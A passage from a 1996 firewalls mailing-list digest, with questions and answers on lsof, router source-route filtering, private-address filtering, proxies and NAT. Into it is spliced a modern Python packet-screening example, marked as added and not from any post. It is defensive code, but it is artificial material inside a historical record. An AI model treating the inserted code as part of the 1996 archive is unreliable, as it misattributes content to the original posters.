Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA21729 for firewalls-outgoing; Thu, 4 Jul 1996 02:30:58 -0700 (PDT) Received: from pegase.total.fr (pegase.total.fr [146.249.152.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA21694 for ; Thu, 4 Jul 1996 02:29:59 -0700 (PDT) Received: from tidtest.total.fr (tidtest.total.fr [146.249.165.73]) by pegase.total.fr (8.6.8/8.6.6) with SMTP id LAA01984; Thu, 4 Jul 1996 11:27:28 +0200 Received: by tidtest.total.fr (4.1/SMI-4.1) Message-Id: <9607040925.AA21474@tidtest.total.fr> To: Sameer - The Terminator Cc: krr@ddeorg.soft.net (Rajesh K. R.), firewalls@greatcircle.com Subject: Re: your mail In-Reply-To: Your message of "Thu, 04 Jul 1996 12:27:13 +0700." X-Cuse: "The dog ate my network" Date: Thu, 04 Jul 1996 11:25:29 +0100 From: Michel Lavondes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

In message <199607040654.BAA10280@gemed.med.ge.com>, Sameer - The Terminator writes:
> Hi,
> even i am looking for that.Could someone help.
> Also, I would like to know how to see the logs on router.
> I am having a cisco router.
> ...sam
>
> >
> > How can I configure router to allow some packets to transmit and vise
> > versa?
> >
>

Ask cisco@spot.colorado.edu. And BTW, this applies to krr's problem only if he has a cisco. Not obvious from his posting ...
Michel Lavondes (lavondes@tidtest.total.fr)
#include
Governments are guilty until proved innocent

From firewalls-owner Thu Jul 4 08:19:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA03048 for firewalls-outgoing; Thu, 4 Jul 1996 08:05:12 -0700 (PDT) Received: from Mailer.Uni-Marburg.DE (papin.HRZ.Uni-Marburg.DE [137.248.1.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA03041 for ; Thu, 4 Jul 1996 08:05:05 -0700 (PDT) Received: from sumbi01.med.Uni-Marburg.DE by Mailer.Uni-Marburg.DE (AIX 3.2/UCB 5.64/20.07.94) Received: by med.uni-marburg.de (8.6.12/ADD-HUB-2.1) Received: from post.med.uni-marburg.de(137.248.202.51) by sumbi01.med.uni-marburg.de via smap (V1.3) Received: from pcmbi60.med.uni-marburg.de (pcmbi60.med.uni-marburg.de [137.248.202.60]) by post.med.uni-marburg.de (8.6.11/8.6.9) with SMTP id RAA04321 for ; Thu, 4 Jul 1996 17:10:22 +0200 Message-Id: <199607041510.RAA04321@post.med.uni-marburg.de> Comments: Authenticated sender is From: "D.A. Meyer" To: firewalls@greatcircle.com Date: Thu, 4 Jul 1996 17:06:16 +0000 Subject: port to process Reply-To: meyerd@Mailer.Uni-Marburg.DE X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm looking for a tool which shows me the PID of the process which is responsible for the offering of a TCP/UDP-port. I think I've seen something here on the list but I do not remember the name.

The cause is: sometimes I see a port (netstat -an) listening like

tcp *.2230 *.* LISTEN
or
tcp *.1749 *.* LISTEN.

I do not know anything about these ports, especially how and when they are started. I'm running fwtk and cern httpd and nothing else (I think).

TIA
Dirk

-----------------------------------------------------------------
Dirk A. Meyer                     meyerd@mailer.uni-marburg.de
Klinikum der Philipps-Universitaet Marburg   Tel.xx49-6421-28-6291
Med. Informatik                              Fax.-------------8921
Bunsenstr.
3 D-35033 Marburg/Lahn
-----------------------------------------------------------------

From firewalls-owner Thu Jul 4 09:04:18 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA05086 for firewalls-outgoing; Thu, 4 Jul 1996 08:47:30 -0700 (PDT) Received: from artemis.rus.uni-stuttgart.de (artemis.rus.uni-stuttgart.de [129.69.18.28]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA05077 for ; Thu, 4 Jul 1996 08:47:21 -0700 (PDT) Received: from info2.rus.uni-stuttgart.de (info2.rus.uni-stuttgart.de [129.69.18.15]) by artemis.rus.uni-stuttgart.de with SMTP id RAA19244 Received: by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03) Message-Id: <9607041542.AA33993@info2.rus.uni-stuttgart.de> Subject: Re: port to process To: meyerd@Papin.HRZ.Uni-Marburg.DE Date: Thu, 4 Jul 1996 17:42:00 +0200 (MST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607041510.RAA04321@post.med.uni-marburg.de> from "D.A. Meyer" at Jul 4, 96 05:06:16 pm From: Helmut Springer Organization: Stuttgart University, FRG X-Pgp-Fingerprint: AE 42 C3 2C A1 3E 55 6D B3 AC 3C D2 F3 CF FF E7 X-Phone: +49 711 685-2003q X-Fax: +49 711 685-2043 X-Mailer: ELM [version 2.4 PL25 PGP6] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

hi,

D.A. Meyer wrote:
> I'm looking for a tool which shows me the PID of the process which is
> responsible for the offering of a TCP/UDP-port. I think i've seen

lsof (list open file descriptors) from Vic Abell
primary site vic.cc.purdue.edu /pub/tools/unix/lsof
current version 3.67 AFAIK.

enjoy
delta

- --
helmut 'delta' springer        Unix/Net Consulting, InfoSystems, StudBox
delta@RUS.Uni-Stuttgart.DE     Stuttgart University, FRG
http://home.pages.de/~delta/
phone : +49 711 685-2003       If you've got to do it,
FAX   : +49 711 685-2043       do it with cold blood...
From firewalls-owner Thu Jul 4 09:19:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06146 for firewalls-outgoing; Thu, 4 Jul 1996 09:10:19 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06139 for ; Thu, 4 Jul 1996 09:10:13 -0700 (PDT) From: ken@bridge.com Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id LAA20770; Thu, 4 Jul 1996 11:00:25 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA20236 Received: (from ken@localhost) by ernie.bridge.com (8.7.5/8.7.3) id LAA04245; Thu, 4 Jul 1996 11:00:45 -0500 (CDT) Date: Thu, 4 Jul 1996 11:00:45 -0500 (CDT) Message-Id: <199607041600.LAA04245@ernie.bridge.com> To: meyerd@Papin.HRZ.Uni-Marburg.DE Subject: Re: port to process Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From: "D.A. Meyer"
>I'm looking for a tool which shows me the PID of the process which is
>responsible for the offering of a TCP/UDP-port. I think i've seen
>something here on the list but i do not remember the name.

You're looking for "lsof". It's available at http://wuarchive.wustl.edu/packages/security/lsof/ among other places.
- KH

From firewalls-owner Thu Jul 4 14:49:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19734 for firewalls-outgoing; Thu, 4 Jul 1996 14:39:28 -0700 (PDT) Received: from diane.inforamp.net (Diane.InfoRamp.Net [198.53.144.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA19727 for ; Thu, 4 Jul 1996 14:39:22 -0700 (PDT) Received: from genel.inforamp.net (mpngate5.ny.us.ibm.com [198.133.29.22]) by diane.inforamp.net (8.7/8.7) with SMTP id RAA29068; Thu, 4 Jul 1996 17:36:39 -0400 (EDT) Received: by genel.inforamp.net with Microsoft Mail Message-ID: <01BB69CE.AF2D9480@genel.inforamp.net> From: Gene Lee To: "firewalls@GreatCircle.COM" Subject: RE: OS/2 firewalls? Date: Thu, 4 Jul 1996 17:31:49 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Check out Netguard at: http://www.netguard.com

FW for both NT and OS/2 platforms.

--
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

----------
From: Uldis Bojars[SMTP:uldis@lda.gov.lv]
Sent: Wednesday, July 03, 1996 4:21 AM
To: firewalls@GreatCircle.COM
Subject: OS/2 firewalls?

Hi! I am searching for OS/2 firewalls - are there any? It's very hard to find, but I think there are some. Of course I do not want OS/2 because I want to use firewall as a workstation ;-)

And - if negative - what are good firewalls for freeBSD? Our company is not so big to buy Sun or HP UNiX computer and use it as a firewall.

Uldis

If you learn from mistakes, you will learn a lot today.
--- GoldED/386 3.00.Alpha1+

From firewalls-owner Thu Jul 4 15:19:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA22221 for firewalls-outgoing; Thu, 4 Jul 1996 15:11:53 -0700 (PDT) Received: from mail.enterprise.net (mail.enterprise.net [194.72.192.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA22214 for ; Thu, 4 Jul 1996 15:11:47 -0700 (PDT) Received: from escom-p100 (max02-115.enterprise.net [194.72.197.115]) by mail.enterprise.net (8.6.12/8.6.12) with SMTP id XAA04678 for ; Thu, 4 Jul 1996 23:20:10 GMT Message-Id: <2.2.32.19960704220855.0068c0fc@mail.enterprise.net> X-Sender: jiffi@mail.enterprise.net X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 04 Jul 1996 23:08:55 +0100 To: firewalls@greatcircle.com From: Craig Wood Subject: Security Policy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm in the process of putting together a Security Policy for my organisation. This policy will cover firewalls, as well as general network security in a mixed NetWare/IPX and NT/IP environment. I have managed to get hold of NCSA's Firewall Policy Guide, but I was wondering if anyone would point me to any other resources on the Net that would help me. Whilst I appreciate that much of a security policy is organisation specific I'm all in favour of not re-inventing the wheel and utilising general rules as a basis for the policy.

If anyone can help, I'd be most grateful.
Thanks and Regards,

Craig

From firewalls-owner Thu Jul 4 16:19:07 1996
From: Robert Hanson
To: Craig Wood
Cc: firewalls@GreatCircle.COM
Subject: Re: Security Policy
Date: Thu, 4 Jul 1996 16:11:33 -0700 (PDT)

being new to this list... i figured i would offer...

www.cert.org

the place i found the reference to this list... i have quite a lot of special hardware and figured it was time to get more into mainstream firewall/filtering procedures for security and reduced router/lan traffic...

thanks

---> Robert H. Hanson
LAN/WAN Consultant - Internet Service Provider
Otis Orchards, Wa.
Cutting Edge Communications
www.cet.com
(509) 927-9541
finger: info@cet.com or email: roberth@cet.com

On Thu, 4 Jul 1996, Craig Wood wrote:

> I'm in the process of putting together a Security Policy for my
> organisation. This policy will cover firewalls, as well as general network
> security in a mixed NetWare/IPX and NT/IP environment. I have managed to
> get hold of NCSA's Firewall Policy Guide, but I was wondering if anyone
> would point me to any other resources on the Net that would help me. Whilst
> I appreciate that much of a security policy is organisation specific I'm all
> in favour of not re-inventing the wheel and utilising general rules as a
> basis for the policy.
>
> If anyone can help, I'd be most grateful.
>
> Thanks and Regards,
>
> Craig
>

From firewalls-owner Thu Jul 4 19:49:13 1996
From: dnewman@mcgraw-hill.com
Date: Thu, 04 Jul 96 22:03:24 edt

>Hi! I am searching for OS/2 firewalls - are there any?

Hi Uldis,

A company called Netguard Ltd. in Israel supposedly does an OS/2-based firewall. I've never seen it, though, so I can't vouch for it. I think Netguard is at http://www.netguard.com

Regards
David Newman

From firewalls-owner Thu Jul 4 22:04:07 1996
From: Frank McCormick
To: firewalls@greatcircle.com
Subject: P50 summary
Date: Thu, 4 Jul 1996 21:52:45 -0700

Folks:

Recently in this list, I posted a pair of questions regarding the filtering capabilities of Ascend's Pipeline 50 router.
My questions dealt with how a P50 could be made to recognize and drop source-routed packets. Several of you, including two Ascend employees, were kind enough to respond, both in the list and privately. As is often the case, some answers were partial, while others posed seeming contradictions. No one was actually wrong about anything, but no one seemed to have the whole story, all in one place.

In subsequent exchanges with the respondents, I've made an attempt to resolve the competing claims and to come up with a coherent picture of what the P50 actually does. The following is a summary of what I've found. Any residual misstatements, confusions and so on are my fault.

* * *

Source-routed packets and the Ascend P50
----------------------------------------

At this time, all Ascend routers drop all packets with Strict Source Routing enabled. The routers, including the Pipeline 50, detect the presence of this option in their IP-recognition layer, before handing off the packet in question to the filtering rules. Any packet with strict source routing turned on is dropped before any rule has a chance to look at it. Hence, any static rule aimed at identifying strict-source-routed packets is unnecessary.

Several people informed me that this was the case for the P50. More specifically, several people said the P50 dropped "source routed" packets by default. However, no one distinguished between strict source routing and loose source routing. Quite frankly, I still don't know what happens to packets having the Loose Source Routing option turned on. There is no mention of source routing at all in any of my P50 documentation.

As I mentioned in my originally posted query, my calls to Ascend's formal tech support staff weren't all that enlightening. Out-of-band conversations with helpful Ascend guys worked a lot better. Regrettably, though, authoritative documentation on this subject is hard to come by, even within Ascend.
The short version is that P50 owners may or may not be protected automatically from attacks based on Loose Source Routing. I just don't know. Those of you who today believe in your site's safety, based partly on your presumed immunity from such attacks, might want to run a few tests and pester Ascend to document this behavior in some credible and accessible manner.

To be fair, Ascend's design choice -- kill before filtering -- is a reasonable one. By definition, Ascend's static filtering rules are ill equipped to deal sensibly with variable-length option data. Source-routing options can, in practice, show up at differing offsets in the packets, whereas an Ascend-style "generic" filter can look only at fixed locations. Hence, static filters are, in the P50, a bad choice for screening source-routed packets. With "generic" filters, you might catch some naively constructed packets of interest, but there are no guarantees. In order to deal correctly with all option-placement possibilities, you must have a packet handler that understands the underlying IP layout, which generic filters plainly do not.

That's the bad news. The good news is that Ascend has recognized the need for this capability. Ascend Communications has unveiled an add-on security utility for some of their routers, including the Pipeline family, to be called Ascend Secure Access. Secure Access is supposed to be smart about IP options and should, at least in this instance, give me what I was looking for in the first place. (It also does a lot more, including dynamic reconfiguration of filtering, that looks handy. This is not an advertisement. I don't own Ascend stock. I'm just a P50 owner, telling you what I found when I went looking.)

Those of you who tend to lie awake at night, worrying about your P50's filtering rules, might want to have a look at this enhancement. I have no idea what Ascend is going to charge for it.
If any of you come up with a dollar figure, please post it back to this list or drop me a note.

Again, this is not an ad for Ascend, but, in the interests of convenience, here are the relevant contact points, for those of you who are interested:

    info@ascend.com
    http://www.ascend.com
    Tel: +1 (510) 769-6001
    Fax: +1 (510) 814-2300
    Fax server: +1 (415) 688-4343

Special thanks to Messrs. Brennen, Edguer, Henits and Wong.

If anything I've said here is wrong, please let me know -- I'll correct my errors in the mailing list. A lot of P50 owners are apparently relying on hearsay for ruleset construction (and lack thereof). This is definitely a case of ignorance not being bliss.

Regards,
Frank McCormick

From firewalls-owner Fri Jul 5 00:52:46 1996
From: Robert Hanson
To: firewalls@greatcircle.com
Subject: special case ips
Date: Fri, 5 Jul 1996 00:30:35 -0700 (PDT)

does anyone have compact filters for livingston equipment for

    127.0.0.0 - 127.255.255.255
    10.0.0.0 - 10.255.255.255
    172.16.0.0 - 172.16.255.255 and
    192.168.0.0 - 192.168.255.255

addresses... apparently these addresses need to be filtered inbound on the gateway... any pointers to faqs or what have you would be greatly appreciated...

---> Robert H. Hanson
LAN/WAN Consultant - Internet Service Provider
Otis Orchards, Wa.
Cutting Edge Communications
www.cet.com
(509) 927-9541
finger: info@cet.com or email: roberth@cet.com

From firewalls-owner Fri Jul 5 01:24:44 1996
From: Jean-Francois Zwobada
Organization: APOGEE Communications
To: Colin Campbell
Cc: Firewalls@GreatCircle.COM
Subject: Re: Integrating Reuters Service thru TIS Toolkit
Date: Fri, 05 Jul 1996 10:10:53 +0200

Colin Campbell wrote:
> I believe they can only do this by supporting transparent proxies and
> that requires kernel hacks which is why Gauntlet (on BSDI only?) supports
> it and the toolkit doesn't. It is in essence nothing more than a router
> filter, restricting access to certain addresses (1.2.3.*).
>
> Colin

You're quite right. The many-to-many feature is only possible for outgoing access with the Gauntlet using the transparency feature. The transparency is available on all platforms, not only BSD/OS.

I won't use the comparison with a router filter since the Gauntlet is a real Application Gateway opening only one client port for a connection (whereas a router filter would allow all >1024 port #).
But you're right to use this comparison to explain the functionality.

Regards,

Jean-Francois

--
______________________ Jean-Francois Zwobada ____________________
Apogee Communications        Tel : +33 (1) 69 85 56 47
Parc Club Universite         Fax : +33 (1) 69 85 56 48
28, rue Jean Rostand
91893 ORSAY Cedex            e-mail : zwobada@apogee-com.fr
__________________________________________________________________

From firewalls-owner Fri Jul 5 01:49:13 1996
From: Jean-Francois Zwobada
Organization: APOGEE Communications
To: Robert Hanson
Cc: firewalls@greatcircle.com
Subject: Re: special case ips
Date: Fri, 05 Jul 1996 10:26:34 +0200

Hi,

You should read RFC1918, dealing with those kinds of network addresses.
--
______________________ Jean-Francois Zwobada ____________________
Apogee Communications        Tel : +33 (1) 69 85 56 47
Parc Club Universite         Fax : +33 (1) 69 85 56 48
28, rue Jean Rostand
91893 ORSAY Cedex            e-mail : zwobada@apogee-com.fr
__________________________________________________________________

From firewalls-owner Fri Jul 5 02:04:11 1996
From: Danny Cox
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V5 #406
Date: Fri, 5 Jul 1996 09:52:45 +0100

>From: "D.A. Meyer"
>
> >I'm looking for a tool which shows me the PID of the process which is
> >responsible for the offering of a TCP/UDP-port. I think i've seen
> >something here on the list but i do not remember the name.
>
> You're looking for "lsof". It's available at
> http://wuarchive.wustl.edu/packages/security/lsof/ among other places.

Hmm .. something I'd *very* much like is an extension to 'ps' to inform me which machines a connection came from, so that I could know - for example - which machine is using a given proxy etc .. anyone any ideas?
I suppose I could just about cope with writing one, but there must be something out there..

cheers,

Danny

From firewalls-owner Fri Jul 5 03:04:14 1996
From: Francois Mauchamp
To: Firewalls@GreatCircle.COM
Subject: Re: Integrating Reuters Service thru TIS Toolkit
Date: Fri, 05 Jul 1996 11:42:14 +0200

At 10:10 05/07/1996 +0200, you wrote:
>Colin Campbell wrote:
>
>> I believe they can only do this by supporting transparent proxies and
>> that requires kernel hacks which is why Gauntlet (on BSDI only?) supports
>> it and the toolkit doesn't. It is in essence nothing more than a router
>> filter, restricting access to certain addresses (1.2.3.*).
>>
>> Colin
>
>You're quite right. The many-to-many feature is only possible for
>outgoing access with the Gauntlet using the transparency feature.
>The transparency is available on all platforms, not only BSD/OS.
>
>I won't use the comparison with a router filter since the Gauntlet
>is a real Application Gateway

Right but ...

> opening only one client port for
>a connection (whereas a router filter would allow all >1024 port #).

...IMHO, this is not the reason (but others) why we can say Gauntlet is an Application Gateway.
Has it something to do with semantic analysis of protocols that are proxied ? :-)

>But you're right to use this comparison to explain the functionality.
>
>Regards,
>
>Jean-Francois
>

Best regards,
Francois.

From firewalls-owner Fri Jul 5 04:19:12 1996
From: Jean-Francois Zwobada
Organization: APOGEE Communications
To: Francois Mauchamp
Cc: Firewalls@GreatCircle.COM
Subject: Re: Integrating Reuters Service thru TIS Toolkit
Date: Fri, 05 Jul 1996 13:05:25 +0200

Francois Mauchamp wrote:
>
> Right but ...
>
> > opening only one client port for
> >a connection (whereas a router filter would allow all >1024 port #).
>
> ...IMHO, this is not the reason (but others) why we can say Gauntlet is an
> Application Gateway.
> Has it something to do with semantic analysis of protocols that are proxied ? :-)
>

yup :^) But plug-gw does not analyse the protocol it relays ! It just takes packets from one socket and puts them in the other socket.
Quite frankly, I just wanted to point out one aspect...I did not want to write a paper on the whole stuff :)

Regards

--
______________________ Jean-Francois Zwobada ____________________
Apogee Communications        Tel : +33 (1) 69 85 56 47
Parc Club Universite         Fax : +33 (1) 69 85 56 48
28, rue Jean Rostand
91893 ORSAY Cedex            e-mail : zwobada@apogee-com.fr
__________________________________________________________________

From firewalls-owner Fri Jul 5 06:34:23 1996
From: Rey.LeClerc/New.York/ACMC
To: Firewalls-Digest
Cc: firewalls-digest
Subject: Re: Firewalls-Digest V5 #404
Date: 5 Jul 96 9:24:06

I am doing some research regarding SWIFT. Are there any security issues regarding this product?

Thanks in advance for your input.
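The following is an added example, not code from any post in this digest; it illustrates two points raised earlier in the thread: Frank McCormick's observation in the P50 summary that a fixed-offset "generic" filter cannot reliably see IP source-route options, and Robert Hanson's question about filtering loopback and private source addresses inbound. The option type codes come from RFC 791, the private blocks from RFC 1918 (the full 172.16/12 is used, rather than the /16 given in the question), and all packets are constructed inline.

```python
# Added example (not from any post in this digest): a header-aware screener
# for the two checks discussed above, source-route options at any offset and
# bogus inbound source addresses.  Every packet below is constructed.
import ipaddress
import struct

IPOPT_EOL, IPOPT_NOP = 0, 1
IPOPT_LSRR, IPOPT_SSRR = 131, 137          # RFC 791 option types 0x83 and 0x89
SOURCE_ROUTE_NAMES = {IPOPT_LSRR: "LSRR", IPOPT_SSRR: "SSRR"}

# Sources that should never arrive from the Internet: loopback plus the three
# RFC 1918 blocks (172.16/12 as the RFC defines it, not the /16 in the question).
BOGUS_INBOUND_SOURCES = [ipaddress.ip_network(n) for n in
                         ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def ipv4_checksum(header: bytes) -> int:
    """One's-complement checksum; 0 when the header's checksum field is correct."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4(src: str, dst: str, options: bytes = b"") -> bytes:
    """Constructed sample: IPv4 header only, protocol 6, no payload."""
    if len(options) % 4:
        options += b"\x00" * (4 - len(options) % 4)     # EOL padding to 32 bits
    ihl = 5 + len(options) // 4
    head = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4, 0, 0, 64, 6, 0,
                       ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    csum = ipv4_checksum(head + options)
    return head[:10] + struct.pack("!H", csum) + head[12:] + options

def parse_ipv4(pkt: bytes) -> dict:
    """The fields a filter needs; raises ValueError instead of guessing on bad input."""
    if len(pkt) < 20:
        raise ValueError("short packet")
    if pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    hlen = (pkt[0] & 0x0F) * 4
    if hlen < 20 or len(pkt) < hlen:
        raise ValueError("bad IHL")
    if ipv4_checksum(pkt[:hlen]) != 0:
        raise ValueError("bad checksum")
    return {"src": ipaddress.ip_address(pkt[12:16]),
            "dst": ipaddress.ip_address(pkt[16:20]),
            "options": pkt[20:hlen]}

def find_source_route_options(options: bytes) -> list:
    """Walk the options area honouring NOP/EOL and per-option lengths; return
    (name, offset) for each LSRR/SSRR.  A length under 2 or one that runs past
    the header is reported as MALFORMED so the caller drops rather than guesses."""
    found, i = [], 0
    while i < len(options):
        kind = options[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:
            i += 1
            continue
        length = options[i + 1] if i + 1 < len(options) else 0
        if length < 2 or i + length > len(options):
            found.append(("MALFORMED", i))
            break
        if kind in SOURCE_ROUTE_NAMES:
            found.append((SOURCE_ROUTE_NAMES[kind], i))
        i += length
    return found

def generic_filter_matches(pkt: bytes, byte_offset: int, value: int) -> bool:
    """Model of a fixed-offset 'generic' filter: one byte compared at one offset."""
    return len(pkt) > byte_offset and pkt[byte_offset] == value

def screen_inbound(pkt: bytes) -> list:
    """Reasons to drop an inbound packet; an empty list means pass."""
    try:
        hdr = parse_ipv4(pkt)
    except ValueError as exc:
        return ["unparseable:%s" % exc]
    reasons = ["option:%s@%d" % hit for hit in find_source_route_options(hdr["options"])]
    reasons += ["source:%s" % net for net in BOGUS_INBOUND_SOURCES if hdr["src"] in net]
    return reasons

# Constructed samples.  A route option is: type, length, pointer (4), hop addresses.
HOP = ipaddress.ip_address("192.0.2.9").packed
SAMPLES = {
    "clean": build_ipv4("198.51.100.7", "203.0.113.1"),
    "ssrr_first": build_ipv4("198.51.100.7", "203.0.113.1", bytes([IPOPT_SSRR, 7, 4]) + HOP),
    # two NOPs shift the option by two bytes, out of a fixed-offset filter's view
    "lsrr_padded": build_ipv4("198.51.100.7", "203.0.113.1",
                              b"\x01\x01" + bytes([IPOPT_LSRR, 7, 4]) + HOP),
    "private_src": build_ipv4("10.1.2.3", "203.0.113.1"),
    "truncated_opt": build_ipv4("198.51.100.7", "203.0.113.1", bytes([IPOPT_LSRR, 9, 4])),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        fixed = any(generic_filter_matches(pkt, 20, t) for t in SOURCE_ROUTE_NAMES)
        print("%-14s generic@20=%-5s header-aware=%s" % (name, fixed, screen_inbound(pkt) or "pass"))
```

Running it shows the fixed-offset check catching only the packet whose option happens to start at byte 20, while the header-aware walk reports the NOP-padded one, the bogus source, and the malformed option.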
From firewalls-owner Fri Jul 5 07:04:10 1996
From: "Irwin Lazar"
Organization: Network Evolutions
To: firewalls@greatcircle.com
Subject: Cisco IP Filters
Date: Fri, 5 Jul 1996 09:58:09 +0000
Reply-To: lazar@netevolve.com

Could someone please point me to some good references on the web relating to implementing IP Access Lists on Cisco routers.

Thanks.

Irwin M. Lazar
Network Evolutions, Inc.
lazar@netevolve.com
http://www.netevolve.com

From firewalls-owner Fri Jul 5 07:19:15 1996
From: "Eddy JAFFRENNOU"
To: firewalls@GreatCircle.com
Subject: NAT and DNS
Date: Fri, 05 Jul 96 16:04:22 WET

Just a little question.
Is it necessary, with the NAT technology, to duplicate the DNS server?

Thanks all.

Eddy JAFFRENNOU

From firewalls-owner Fri Jul 5 08:04:27 1996
From: peter@baileynm.com (Peter da Silva)
To: Russ.Cooper@RC.Toronto.on.ca (Russ)
Cc: firewalls@greatcircle.com
Subject: Re: NetworkMCI Webmaker
Date: Fri, 5 Jul 1996 09:43:06 -0500 (CDT)

Re: http://www.webmaker.mci.com/webmaker/features/secbrf.htm

Well well well:

> Netscape server - this user account only allows the Netscape Communication
> Server process to log into NT as a service. Logging in as a service allows
> the networkMCI WebMaker to control all accesses of the process. Since no
> external log in is permitted for this service, password guessing is not an
> option. Netscape permissions narrows the total resources available to
> Netscape to those in the Netscape directory on the C:\ drive.

Haven't there been a couple of reports about major CGI holes in the Netscape server?
Doesn't that make the lack of password guessing a moot point? All you need to do is get one DLL in there and you can proxy anything you want through to the internal net... and they've helpfully told us port 443 is available for that purpose.

> 443 - TCP Secure Http (not supported in networkMCI WebMaker 1.0)

And they end with:

> While achieving 100% security is not practical, it is important to
> match desired access security with the value of the resources being
> protected. networkMCI WebMaker's firewall security system meets, or
> exceeds the security requirements of most small to medium sized
> businesses.

Anyone remember the parable of the widow's mite?

From firewalls-owner Fri Jul 5 09:34:35 1996
From: Rachel Rosencrantz
Reply-To: rachelr@pobox.com
Organization: Predictive Systems
To: Firewalls@GreatCircle.COM
Subject: Active X and plugins (And the MSN Explorer)
Date: Fri, 05 Jul 1996 09:38:43 -0400

I haven't really been reading up on the MSN Explorer but just the other day I overheard someone say that the latest downloads plug-ins and installs them automatically. Is there a way to disable this or is this a permanent feature of the browser? Is this the default setting?
I know that users can and do download plug-ins and install them, but unless there is something in the MSN security model that I'm unaware of, it seems like this would be a great way to stick some really unpleasant code on a lot of random machines without people necessarily knowing they've done it. (Check out this cool page with -put the most popular words here- and see the latest blah... Put something on the page that requires your plugin, and voila, instant mods on their browser.) What kind of security does the MS Explorer browser have to prevent vicious plug-ins?

-Rachel

From firewalls-owner Fri Jul 5 09:53:03 1996
From: Michel Lavondes
To: lazar@netevolve.com
Cc: firewalls@greatcircle.com
Subject: Re: Cisco IP Filters
Date: Fri, 05 Jul 1996 18:39:46 +0100

In message <9607051400.AA04977@netevolve.com>, "Irwin Lazar" writes:
> Could someone please point me to some good references on the web
> relating to implementing IP Access Lists on Cisco routers.
>

http://www.cisco.com/, "Technical tips" (under the heading "Technical assistance"). Not sure whether you can access it without a maintenance contract.
If you can't, try cisco@spot.colorado.edu, but chances are they will point you to their web server :-(

Michel Lavondes (lavondes@tidtest.total.fr)
#include
Governments are guilty until proved innocent

From firewalls-owner Fri Jul 5 10:19:20 1996
From: Michel Lavondes
To: "Eddy JAFFRENNOU"
Cc: firewalls@greatcircle.com
Subject: Re: NAT and DNS
Date: Fri, 05 Jul 1996 19:00:51 +0100

In message <9606058366.AA836607904@gtw-smtp.businessobjects.com>, "Eddy JAFFRENNOU" writes:
> Just a little question.
>
> Is it necessary, with the NAT technology, to duplicate the DNS
> server?
>

Not quite sure what you have in mind, but I'll answer anyway :-)

Your clients behind the NAT box don't need a split DNS, they should work the same wrt DNS with or without a NAT box. The machines, if any, sitting between the NAT box and the Internet (eg, WEB server accessible from outside) don't need it either, provided the NAT box can be configured to pass untouched the address of your DNS server(s) (assuming they're behind the NAT box).
The only reason I can think of why you would need a split DNS is when accessing outside servers that do an address-to-name check a la wu-ftpd, in which case you would need a NAT-aware DNS server, presumably part of the NAT box itself, but even then, I don't think you would need another DNS server on top of that, except maybe for performance reasons.

HTH

Michel Lavondes (lavondes@tidtest.total.fr)
#include
Governments are guilty until proved innocent

From firewalls-owner Fri Jul 5 10:49:21 1996
From: Boni Bruno - Director of Internet Services & Security
Organization: Data Systems West
To: Firewalls@GreatCircle.COM
Cc: mbai@straticom.com
Subject: Re: Firewalls-Digest V5 #393
Date: Fri, 05 Jul 1996 10:43:40 -0700

> Date: Thu, 27 Jun 1996 09:06:16 -0400
> From: Mario Bai
> Subject: Re: IP address for Enterprises use
>
> >Robert Bonomi wrote:
> > + Dear All,
> > +
> > + Who can tell me where I can find the RFC document about Enterprises IP address.
> > +
> > + In order to avoid conflicting with Internet IP address. Our Company will use some IP address matching RFC definition.
> > +
> > + If anybody know the solution, please let me know where I can get such document.
> > +
> >
> > use the class A address 10.0.0.0 netmask 255.0.0.0 this is safe.
> >
> What is the potential problems introduced when using "bogus" or reserved
> IP address behind a firewall/proxy server? I know that the proxy server
> should translate all internal IP addresses and only present its own IP
> address to the Internet (or receiving server), but if you have
